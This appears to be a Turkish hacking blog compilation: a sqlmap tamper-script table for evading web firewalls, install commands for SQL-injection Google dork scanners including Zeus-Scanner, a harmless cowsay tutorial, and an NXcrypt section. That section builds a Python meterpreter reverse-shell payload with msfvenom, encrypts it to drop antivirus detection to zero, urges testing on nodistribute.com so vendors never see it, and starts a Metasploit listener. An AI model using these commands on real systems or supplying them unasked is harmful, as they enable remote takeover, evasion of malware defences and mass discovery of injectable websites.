-->

SQLMap Tamper Scripts

SQLMAP TAMPER SCRİPTS,


Sqlmap'de "tamper" (sabotaj) seçeneklerini anlamak.

Selamun ALeyküm ..
Aşagıdaki tabloada tamperlarin nerede kullanabiecegimizi görebeliceginiz bir tablo var.
Sabotaj verilerini kullanmanın, güvenlik duvarlarından kaçınmak ve olası bir uygulamayı filtrelemenin en büyük amacı olsa da, ne tür bir veritabanı yöneticisinin ne tür bir uygulayıcıya başvurduğunu bilmesi gerekir. 

Not: 
(*) Tüm sürümler için işe yarayabilir.
(-) uygulanmaz

TAMPERMySQLMSSQLOraclePostgreSQL
apostrophemask****
apostrophenullencode----
appendnullbyte****
base64encode4,5,5.5200510g-
between5.1---
bluecoat****
apostrophemask9.0.32000,2005-9.3
charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0
charencode*---
commalessmid*---
concat2concatws****
equaltolike****
greatest< 5.1---
halfversionedmorekeywords5.0 and 5.5---
ifnull2ifisnull****
informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0
lowercase5.0---
modsecurityversioned5.0---
modsecurityzeroversioned****
multiplespaces****
nonrecursivereplacement****
overlongutf85.1.56,5.5.112000, 2005N/A9.0
percentage4, 5.0,5.5200510g8.3,8.4,9.0
randomcase****
randomcomments****
securesphere4,5.0,5.5200510g8.3,8.4,9.0
space2comment----
space2dash4.0,5.0---
space2hash>= 5.1.13---
space2morehash-2000, 2005--
space2mssqlblank**--
space2mssqlhash****
space2plus4,5.0,5.5200510g8.3,8.4,9.0
space2randomblank-*--
sp_password****
symboliclogical****
unionalltounion****
unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0
uppercase****
varnish*---
versionedkeywords>=5.1.13---
versionedmorekeywords****
xforwardedfor****

Kali Linux SQLi Google Dork Scanner

Kali Linux SQLi Google Dork Scanner
Selamun Aleyküm ..

XGDork Google Dork Tarayıcı
Python 2.7 için ViraX @ 2018 tarafından kodlanan SQLi Google Dork Tarayıcı / Termux.Android.Lollipop5.0

Python 2.7 için URL aramayı otomatikleştiren, SQL enjeksiyonuna açık olan basit 'naif' program

[!] YASAL UYARI: Bu program ile yapacağınız yasadışı eylemlerden sorumlu değilim!,

Kurulum
git clone https://github.com/E4rr0r4/XGDork.git
cd XGDork
pip2 install requests
pip2 install termcolor
python2 XGDork.py --help


Kali Linux Cowsay & Figlet

Kali Linux Cowsay & Figlet
Selamun Aleyküm ...

GNU / Linux Terminalinizi Figlet ve Cowsay ile nasıl güzelleştireceğinizden bahsettim.
ilk olarak "apt-get install figlet " komutuyla figleti kuruyoruz
ardından ; Cowsay = "apt-get install cowsay" yazarak kurun.

Yeni bir terminal açıp root dizinindeyken (pwd) leafpad .bashrc dosyasını açınız. en alt satıra inerek;

figlet Nickiniz & Yada yazmak ıstedıgınız seyi yazınız.

Örnek: 
figlet TrazeR . org
/usr/games/cowsay -f  stegosaurus " Cyber-WarrioR.org "

cowsayı nasıl ekledık derseniz ;

cd /usr/share/cowsay/cows/ komutla cowsayın bulundugu dızıne girip ls komutuyla listeledikten sonra rasgele ascii hedef seçip dosya yolunu belirttiken sonra -f komutuyla kullanmak ıstedıgım ascii.cow'u belirttim " tırnak içinde istedigim metni yazdim"
Sonuç :
Cowsay Bazi Kullanım Örnekleri
/usr/games/cowsay -b TrazeR ===> bunu bashrc dosyanıza bu şekilde eklerseniz her terminali açtıgınızda aşağıdaki örnek resim gibi açılır.

/usr/games/cowsay -d Dead  ===> -d parametresi inegin ölü görünmesini saglar. İnek Öldü başımız saolsun

/usr/games/cowsay -g açgözlü inek modu ===> -g parametresi inegi aç gözlü moda alır. bizim inek canlandi.


 /usr/games/cowsay -p paronaya inek ===> -p parametresi ineği paronaya yapar.

/usr/games/cowsay -t yorgun inek

 /usr/games/cowsay -f dragon Cyber-WarrioR AKINCILAR ===>
–f seçeneği, kullanılacak belirli bir inek resmi dosyasını (cowfile) belirtir. Bu örnekte size bir ejderha resmi gösteriyorum. 
 Genel Olarak Kullanim: /usr/games/cowsay –f <cowfile> mesajiniz


                                                                           Video:



Kali Linux NXcrypt - Python Backdoor Framework

Selamun Aleyküm ..

msfvenom -p python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port -o /root/Masaüstü/output.py

git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt
python NXcrypt.py --help

python NXcrypt.py -f /root/Masaüstü/testingpython.py -o /root/Masaüstü/cryptpython.py 


Before: Detected by 1/38
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd 

After:
 Detected by 0/37
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd

ENCRYPTİON FİNİSHED

Stop Using Virustotal !!!! Please, Use nodistribute.com

continuation :
msfconsole 
use exploit/multi/handler/
use payload/python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port
options
ok
exploit -j


Kali Linux Auto Sql Dork Scanner

Selamun Aleyküm..

Resmi web sitesinden python 3'ü indirin https://www.python.org/downloads/ Sistemdeki python 3'ü yükleyin
Yada apt-get install python3

git clone https://github.com/aungsanoo/auto-sql-dork-scanner.git
python3 sql.py

dork.txt dosyasını istediğiniz gibi değiştirebilirsiniz.

Kali Linux Zeus-Scanner

Zeus nedir?
Zeus, web uygulaması keşiflerini basitleştirmek için tasarlanmış gelişmiş bir keşif programıdır. Zeus, güçlü bir yerleşik URL ayrıştırma motoru, birden fazla arama motoru uyumluluğu, URL'leri hem yasaklama hem de webcache URL'lerinden çıkarma, hedef üzerinde birden fazla güvenlik açığı değerlendirmesi yapma ve arama motoru captcha'larını atlama yeteneğine sahip olarak gelir.

Genel Özellikler:
Çoklu arama motoru uyumluluk ( DuckDuckGo, AOL, Bing, ve Google varsayılan Google)
Birden fazla güvenlik açığı değerlendirmesi (XSS, SQLi, clickjacking, port tarama, yönetici paneli bulma, whois aramaları ve daha fazlası)
URL’yi Google’ın yasak URL’si üzerinden alma ve böylece IP bloklarını atlayabilme
XSS yüklerini gizlemek için sabotaj komut dosyaları
20'den fazla farklı güvenlik duvarının WAF / IPS / IDS korumasını belirleme

Kurulum : 
Ubuntu / Debian
sudo apt-get install libxml2-dev libxslt1-dev python-dev &&  git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py

Genel Kullanım : python zeus.py -d inurl:news.php?id=